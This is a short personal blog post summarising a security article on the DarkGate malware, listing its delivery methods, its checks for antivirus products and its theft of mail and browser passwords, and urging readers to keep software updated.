This is a very lengthy blog, and yes, I’m still behind. Sometimes it might not be so bad to be behind because of blogs like this one.
This one is especially dangerous because of the fact it uses so many different file types like .msi or .lnk as two different types of files that could be starting something.
We know the .msi file is used to start an installation process, and .lnk files are usually shortcut files to other programs like a shortcut to Notepad as an example.
This thing looks for programs that are supposed to help you defend yourself. I assume by this reading that it either kills itself if these processes are found or it kills it if found.
Some of the well-known programs are: Trend Micro, Norton or Symantec products, Malwarebytes, F-Secure products and AVG.
The headings besides the article title include: DarkGate overview, Delivery methods, Phishing, Malvertising, SEO poisoning, DarkGate infection chain:, Infection chain with MSI, Infection chain with LOLBINs, DarkGate capabilities, Security software discovery, Lateral movement, Creation and storage of remote credential, Execution of Psexec, and many more. Spome are heading 3 while a chunk are heading 2.
What interested me the most about this article was the discovery of antivirus protection, although this is not the first piece of malware that does this. I’m sure that this blog has covered this even though we lost old content prior to when this one has stayed around.
This piece of malware can do password scraping both through mail and web browsers too. I think this is something to worry about, as some people may be using the same passwords to other things.
This is not to target those who use passwords in different locations that may be the same, this is to notify you that this software can do this bot mail and browser.
I didn’t see which clients the software takes from, but make sure your mail client is up to date.
Please read the article Inside DarkGate: Exploring the infection chain and capabilities and read the sections that might benefit you.
Thanks so much for reading, make it a great day!
Discover more from Jared's Technology podcast network
Subscribe to get the latest posts sent to your email.